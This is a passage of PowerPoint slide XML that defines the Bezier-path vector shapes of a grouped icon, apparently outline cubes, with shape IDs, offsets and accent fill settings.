                <a:gd name="T26" fmla="*/ 345 w 421"/>
                <a:gd name="T27" fmla="*/ 368 h 371"/>
                <a:gd name="T28" fmla="*/ 333 w 421"/>
                <a:gd name="T2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1" h="371">
                  <a:moveTo>
                    <a:pt x="333" y="371"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="371"/>
                    <a:pt x="326" y="370"/>
                    <a:pt x="322" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="215"/>
                    <a:pt x="15" y="215"/>
                    <a:pt x="15" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="211"/>
                    <a:pt x="0" y="202"/>
                    <a:pt x="0" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="182"/>
                    <a:pt x="6" y="173"/>
                    <a:pt x="15" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="6"/>
                    <a:pt x="344" y="6"/>
                    <a:pt x="344" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="0"/>
                    <a:pt x="372" y="5"/>
                    <a:pt x="378" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="385" y="30"/>
                    <a:pt x="379" y="46"/>
                    <a:pt x="367" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="192"/>
                    <a:pt x="84" y="192"/>
                    <a:pt x="84" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="316"/>
                    <a:pt x="333" y="316"/>
                    <a:pt x="333" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="292"/>
                    <a:pt x="379" y="292"/>
                    <a:pt x="379" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="285"/>
                    <a:pt x="407" y="290"/>
                    <a:pt x="414" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="421" y="315"/>
                    <a:pt x="416" y="331"/>
                    <a:pt x="403" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="368"/>
                    <a:pt x="345" y="368"/>
                    <a:pt x="345" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="370"/>
                    <a:pt x="338" y="371"/>
                    <a:pt x="333" y="371"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="128" name="Group 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51EC9CA-08A8-104C-B3E7-E1D305E681AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8406350" y="1891481"/>
              <a:ext cx="425105" cy="385162"/>
              <a:chOff x="1515221" y="5494379"/>
              <a:chExt cx="425105" cy="385162"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129" name="Freeform 764">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A966D160-8387-BB47-AB5D-064E45F9CAF3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1649315" y="5494379"/>
                <a:ext cx="161673" cy="145506"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 333 w 678"/>
                  <a:gd name="T1" fmla="*/ 615 h 615"/>
                  <a:gd name="T2" fmla="*/ 321 w 678"/>
                  <a:gd name="T3" fmla="*/ 612 h 615"/>
                  <a:gd name="T4" fmla="*/ 15 w 678"/>
                  <a:gd name="T5" fmla="*/ 436 h 615"/>
                  <a:gd name="T6" fmla="*/ 2 w 678"/>
                  <a:gd name="T7" fmla="*/ 413 h 615"/>
                  <a:gd name="T8" fmla="*/ 0 w 678"/>
                  <a:gd name="T9" fmla="*/ 38 h 615"/>
                  <a:gd name="T10" fmla="*/ 26 w 678"/>
                  <a:gd name="T11" fmla="*/ 12 h 615"/>
                  <a:gd name="T12" fmla="*/ 26 w 678"/>
                  <a:gd name="T13" fmla="*/ 12 h 615"/>
                  <a:gd name="T14" fmla="*/ 52 w 678"/>
                  <a:gd name="T15" fmla="*/ 38 h 615"/>
                  <a:gd name="T16" fmla="*/ 54 w 678"/>
                  <a:gd name="T17" fmla="*/ 398 h 615"/>
                  <a:gd name="T18" fmla="*/ 334 w 678"/>
                  <a:gd name="T19" fmla="*/ 559 h 615"/>
                  <a:gd name="T20" fmla="*/ 626 w 678"/>
                  <a:gd name="T21" fmla="*/ 397 h 615"/>
                  <a:gd name="T22" fmla="*/ 626 w 678"/>
                  <a:gd name="T23" fmla="*/ 26 h 615"/>
                  <a:gd name="T24" fmla="*/ 652 w 678"/>
                  <a:gd name="T25" fmla="*/ 0 h 615"/>
                  <a:gd name="T26" fmla="*/ 678 w 678"/>
                  <a:gd name="T27" fmla="*/ 26 h 615"/>
                  <a:gd name="T28" fmla="*/ 678 w 678"/>
                  <a:gd name="T29" fmla="*/ 412 h 615"/>
                  <a:gd name="T30" fmla="*/ 665 w 678"/>
                  <a:gd name="T31" fmla="*/ 435 h 615"/>
                  <a:gd name="T32" fmla="*/ 346 w 678"/>
                  <a:gd name="T33" fmla="*/ 612 h 615"/>
                  <a:gd name="T34" fmla="*/ 333 w 678"/>
                  <a:gd name="T35" fmla="*/ 615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8" h="615">
                    <a:moveTo>
                      <a:pt x="333" y="615"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="329" y="615"/>
                      <a:pt x="325" y="614"/>
                      <a:pt x="321" y="612"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="436"/>
                      <a:pt x="15" y="436"/>
                      <a:pt x="15" y="436"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="431"/>
                      <a:pt x="3" y="423"/>
                      <a:pt x="2" y="413"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="38"/>
                      <a:pt x="0" y="38"/>
                      <a:pt x="0" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="24"/>
                      <a:pt x="12" y="12"/>
                      <a:pt x="26" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="12"/>
                      <a:pt x="26" y="12"/>
                      <a:pt x="26" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="12"/>
                      <a:pt x="52" y="24"/>
                      <a:pt x="52" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="398"/>
                      <a:pt x="54" y="398"/>
                      <a:pt x="54" y="398"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="334" y="559"/>
                      <a:pt x="334" y="559"/>
                      <a:pt x="334" y="559"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="626" y="397"/>
                      <a:pt x="626" y="397"/>
                      <a:pt x="626" y="397"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="626" y="26"/>
                      <a:pt x="626" y="26"/>
                      <a:pt x="626" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="626" y="12"/>
                      <a:pt x="638" y="0"/>
                      <a:pt x="652" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="666" y="0"/>
                      <a:pt x="678" y="12"/>
                      <a:pt x="678" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="678" y="412"/>
                      <a:pt x="678" y="412"/>
                      <a:pt x="678" y="412"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="678" y="421"/>
                      <a:pt x="673" y="430"/>
                      <a:pt x="665" y="435"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="346" y="612"/>
                      <a:pt x="346" y="612"/>
                      <a:pt x="346" y="612"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="342" y="614"/>
                      <a:pt x="338" y="615"/>
                      <a:pt x="333"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130" name="Freeform 768">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52340583-EB11-494C-B6EB-43BAD4D38B3F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1722543" y="5533370"/>
                <a:ext cx="12364" cy="106514"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 51"/>
                  <a:gd name="T1" fmla="*/ 450 h 450"/>
                  <a:gd name="T2" fmla="*/ 0 w 51"/>
                  <a:gd name="T3" fmla="*/ 424 h 450"/>
                  <a:gd name="T4" fmla="*/ 0 w 51"/>
                  <a:gd name="T5" fmla="*/ 26 h 450"/>
                  <a:gd name="T6" fmla="*/ 25 w 51"/>
                  <a:gd name="T7" fmla="*/ 0 h 450"/>
                  <a:gd name="T8" fmla="*/ 51 w 51"/>
                  <a:gd name="T9" fmla="*/ 26 h 450"/>
                  <a:gd name="T10" fmla="*/ 51 w 51"/>
                  <a:gd name="T11" fmla="*/ 424 h 450"/>
                  <a:gd name="T12" fmla="*/ 25 w 51"/>
                  <a:gd name="T13" fmla="*/ 450 h 450"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="51" h="450">
                    <a:moveTo>
                      <a:pt x="25" y="450"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="450"/>
                      <a:pt x="0" y="438"/>
                      <a:pt x="0" y="424"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="11" y="0"/>
                      <a:pt x="25" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="51" y="12"/>
                      <a:pt x="51" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="424"/>
                      <a:pt x="51" y="424"/>
                      <a:pt x="51" y="424"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="438"/>
                      <a:pt x="40" y="450"/>
                      <a:pt x="25" y="4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131" name="Freeform 769">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D84B5F-9228-A74B-B837-D954D492683E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1516172" y="5729280"/>
                <a:ext cx="160722" cy="146457"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 344 w 677"/>
                  <a:gd name="T1" fmla="*/ 615 h 615"/>
                  <a:gd name="T2" fmla="*/ 331 w 677"/>
                  <a:gd name="T3" fmla="*/ 612 h 615"/>
                  <a:gd name="T4" fmla="*/ 13 w 677"/>
                  <a:gd name="T5" fmla="*/ 435 h 615"/>
                  <a:gd name="T6" fmla="*/ 0 w 677"/>
                  <a:gd name="T7" fmla="*/ 412 h 615"/>
                  <a:gd name="T8" fmla="*/ 0 w 677"/>
                  <a:gd name="T9" fmla="*/ 26 h 615"/>
                  <a:gd name="T10" fmla="*/ 25 w 677"/>
                  <a:gd name="T11" fmla="*/ 0 h 615"/>
                  <a:gd name="T12" fmla="*/ 51 w 677"/>
                  <a:gd name="T13" fmla="*/ 26 h 615"/>
                  <a:gd name="T14" fmla="*/ 51 w 677"/>
                  <a:gd name="T15" fmla="*/ 397 h 615"/>
                  <a:gd name="T16" fmla="*/ 344 w 677"/>
                  <a:gd name="T17" fmla="*/ 560 h 615"/>
                  <a:gd name="T18" fmla="*/ 623 w 677"/>
                  <a:gd name="T19" fmla="*/ 398 h 615"/>
                  <a:gd name="T20" fmla="*/ 625 w 677"/>
                  <a:gd name="T21" fmla="*/ 38 h 615"/>
                  <a:gd name="T22" fmla="*/ 651 w 677"/>
                  <a:gd name="T23" fmla="*/ 13 h 615"/>
                  <a:gd name="T24" fmla="*/ 651 w 677"/>
                  <a:gd name="T25" fmla="*/ 13 h 615"/>
                  <a:gd name="T26" fmla="*/ 677 w 677"/>
                  <a:gd name="T27" fmla="*/ 39 h 615"/>
                  <a:gd name="T28" fmla="*/ 675 w 677"/>
                  <a:gd name="T29" fmla="*/ 414 h 615"/>
                  <a:gd name="T30" fmla="*/ 662 w 677"/>
                  <a:gd name="T31" fmla="*/ 436 h 615"/>
                  <a:gd name="T32" fmla="*/ 357 w 677"/>
                  <a:gd name="T33" fmla="*/ 612 h 615"/>
                  <a:gd name="T34" fmla="*/ 344 w 677"/>
                  <a:gd name="T35" fmla="*/ 615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7" h="615">
                    <a:moveTo>
                      <a:pt x="344" y="615"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="340" y="615"/>
                      <a:pt x="335" y="614"/>
                      <a:pt x="331" y="612"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="435"/>
                      <a:pt x="13" y="435"/>
                      <a:pt x="13" y="435"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="430"/>
                      <a:pt x="0" y="422"/>
                      <a:pt x="0" y="412"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="11" y="0"/>
                      <a:pt x="25" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="51" y="12"/>
                      <a:pt x="51" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="397"/>
                      <a:pt x="51" y="397"/>
                      <a:pt x="51" y="397"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="344" y="560"/>
                      <a:pt x="344" y="560"/>
                      <a:pt x="344" y="560"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="623" y="398"/>
                      <a:pt x="623" y="398"/>
                      <a:pt x="623" y="398"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="625" y="38"/>
                      <a:pt x="625" y="38"/>
                      <a:pt x="625" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="625" y="24"/>
                      <a:pt x="637" y="13"/>
                      <a:pt x="651" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="651" y="13"/>
                      <a:pt x="651" y="13"/>
                      <a:pt x="651" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="666" y="13"/>
                      <a:pt x="677" y="24"/>
                      <a:pt x="677" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="414"/>
                      <a:pt x="675" y="414"/>
                      <a:pt x="675" y="414"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="423"/>
                      <a:pt x="670" y="431"/>
                      <a:pt x="662" y="436"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="357" y="612"/>
                      <a:pt x="357" y="612"/>
                      <a:pt x="357" y="612"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="353" y="614"/>
                      <a:pt x="348" y="615"/>
                      <a:pt x="344" y="6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132" name="Freeform 770">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{358067AC-8AA2-004F-BF39-EE62B190EB85}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1515221" y="5693141"/>
                <a:ext cx="83690" cy="67522"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 190 w 353"/>
                  <a:gd name="T1" fmla="*/ 284 h 284"/>
                  <a:gd name="T2" fmla="*/ 179 w 353"/>
                  <a:gd name="T3" fmla="*/ 281 h 284"/>
                  <a:gd name="T4" fmla="*/ 15 w 353"/>
                  <a:gd name="T5" fmla="*/ 202 h 284"/>
                  <a:gd name="T6" fmla="*/ 1 w 353"/>
                  <a:gd name="T7" fmla="*/ 179 h 284"/>
                  <a:gd name="T8" fmla="*/ 15 w 353"/>
                  <a:gd name="T9" fmla="*/ 156 h 284"/>
                  <a:gd name="T10" fmla="*/ 312 w 353"/>
                  <a:gd name="T11" fmla="*/ 6 h 284"/>
                  <a:gd name="T12" fmla="*/ 346 w 353"/>
                  <a:gd name="T13" fmla="*/ 18 h 284"/>
                  <a:gd name="T14" fmla="*/ 335 w 353"/>
                  <a:gd name="T15" fmla="*/ 52 h 284"/>
                  <a:gd name="T16" fmla="*/ 85 w 353"/>
                  <a:gd name="T17" fmla="*/ 178 h 284"/>
                  <a:gd name="T18" fmla="*/ 201 w 353"/>
                  <a:gd name="T19" fmla="*/ 234 h 284"/>
                  <a:gd name="T20" fmla="*/ 213 w 353"/>
                  <a:gd name="T21" fmla="*/ 269 h 284"/>
                  <a:gd name="T22" fmla="*/ 190 w 353"/>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284">
                    <a:moveTo>
                      <a:pt x="190" y="284"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="186" y="284"/>
                      <a:pt x="182" y="283"/>
                      <a:pt x="179" y="281"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="202"/>
                      <a:pt x="15" y="202"/>
                      <a:pt x="15" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="198"/>
                      <a:pt x="1" y="189"/>
                      <a:pt x="1" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="169"/>
                      <a:pt x="6" y="160"/>
                      <a:pt x="15" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="6"/>
                      <a:pt x="312" y="6"/>
                      <a:pt x="312" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="0"/>
                      <a:pt x="340" y="5"/>
                      <a:pt x="346" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="353" y="30"/>
                      <a:pt x="348" y="46"/>
                      <a:pt x="335" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="178"/>
                      <a:pt x="85" y="178"/>
                      <a:pt x="85" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="234"/>
                      <a:pt x="201" y="234"/>
                      <a:pt x="201" y="234"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="241"/>
                      <a:pt x="220" y="256"/>
                      <a:pt x="213" y="269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="278"/>
                      <a:pt x="200" y="284"/>
                      <a:pt x="190" y="2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133" name="Freeform 772">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0E7F43-541A-3F44-BEE4-02196DE64C94}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1577037" y="5693141"/>
                <a:ext cx="99857" cy="87494"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 87 w 420"/>
                  <a:gd name="T1" fmla="*/ 371 h 371"/>
                  <a:gd name="T2" fmla="*/ 75 w 420"/>
                  <a:gd name="T3" fmla="*/ 368 h 371"/>
                  <a:gd name="T4" fmla="*/ 17 w 420"/>
                  <a:gd name="T5" fmla="*/ 338 h 371"/>
                  <a:gd name="T6" fmla="*/ 6 w 420"/>
                  <a:gd name="T7" fmla="*/ 303 h 371"/>
                  <a:gd name="T8" fmla="*/ 41 w 420"/>
                  <a:gd name="T9" fmla="*/ 292 h 371"/>
                  <a:gd name="T10" fmla="*/ 87 w 420"/>
                  <a:gd name="T11" fmla="*/ 316 h 371"/>
                  <a:gd name="T12" fmla="*/ 336 w 420"/>
                  <a:gd name="T13" fmla="*/ 192 h 371"/>
                  <a:gd name="T14" fmla="*/ 54 w 420"/>
                  <a:gd name="T15" fmla="*/ 52 h 371"/>
                  <a:gd name="T16" fmla="*/ 42 w 420"/>
                  <a:gd name="T17" fmla="*/ 18 h 371"/>
                  <a:gd name="T18" fmla="*/ 77 w 420"/>
                  <a:gd name="T19" fmla="*/ 6 h 371"/>
                  <a:gd name="T20" fmla="*/ 406 w 420"/>
                  <a:gd name="T21" fmla="*/ 169 h 371"/>
                  <a:gd name="T22" fmla="*/ 420 w 420"/>
                  <a:gd name="T23" fmla="*/ 192 h 371"/>
                  <a:gd name="T24" fmla="*/ 406 w 420"/>
                  <a:gd name="T25" fmla="*/ 216 h 371"/>
                  <a:gd name="T26" fmla="*/ 98 w 420"/>
                  <a:gd name="T27" fmla="*/ 368 h 371"/>
                  <a:gd name="T28" fmla="*/ 87 w 420"/>
                  <a:gd name="T29" fmla="*/ 371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0" h="371">
                    <a:moveTo>
                      <a:pt x="87" y="371"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="371"/>
                      <a:pt x="79" y="370"/>
                      <a:pt x="75" y="368"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="338"/>
                      <a:pt x="17" y="338"/>
                      <a:pt x="17" y="338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="331"/>
                      <a:pt x="0" y="316"/>
                      <a:pt x="6" y="303"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="290"/>
                      <a:pt x="29" y="285"/>
                      <a:pt x="41" y="292"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="316"/>
                      <a:pt x="87" y="316"/>
                      <a:pt x="87" y="316"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="336" y="192"/>
                      <a:pt x="336" y="192"/>
                      <a:pt x="336" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="52"/>
                      <a:pt x="54" y="52"/>
                      <a:pt x="54" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="46"/>
                      <a:pt x="36" y="31"/>
                      <a:pt x="42" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="5"/>
                      <a:pt x="64" y="0"/>
                      <a:pt x="77" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="406" y="169"/>
                      <a:pt x="406" y="169"/>
                      <a:pt x="406" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="415" y="174"/>
                      <a:pt x="420" y="183"/>
                      <a:pt x="420" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="420" y="202"/>
                      <a:pt x="415" y="211"/>
                      <a:pt x="406" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="368"/>
                      <a:pt x="98" y="368"/>
                      <a:pt x="98" y="368"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="370"/>
                      <a:pt x="91" y="371"/>
                      <a:pt x="87" y="3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134" name="Freeform 773">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE70FFB0-FD97-6746-867B-9DC0D6B2C6EE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1591302" y="5768272"/>
                <a:ext cx="12364" cy="107465"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 52"/>
                  <a:gd name="T1" fmla="*/ 450 h 450"/>
                  <a:gd name="T2" fmla="*/ 0 w 52"/>
                  <a:gd name="T3" fmla="*/ 424 h 450"/>
                  <a:gd name="T4" fmla="*/ 0 w 52"/>
                  <a:gd name="T5" fmla="*/ 26 h 450"/>
                  <a:gd name="T6" fmla="*/ 26 w 52"/>
                  <a:gd name="T7" fmla="*/ 0 h 450"/>
                  <a:gd name="T8" fmla="*/ 52 w 52"/>
                  <a:gd name="T9" fmla="*/ 26 h 450"/>
                  <a:gd name="T10" fmla="*/ 52 w 52"/>
                  <a:gd name="T11" fmla="*/ 424 h 450"/>
                  <a:gd name="T12" fmla="*/ 26 w 52"/>
                  <a:gd name="T13" fmla="*/ 450 h 450"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="52" h="450">
                    <a:moveTo>
                      <a:pt x="26" y="450"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="450"/>
                      <a:pt x="0" y="439"/>
                      <a:pt x="0" y="424"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="12" y="0"/>
                      <a:pt x="26" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="52" y="12"/>
                      <a:pt x="52" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="424"/>
                      <a:pt x="52" y="424"/>
                      <a:pt x="52" y="424"/>
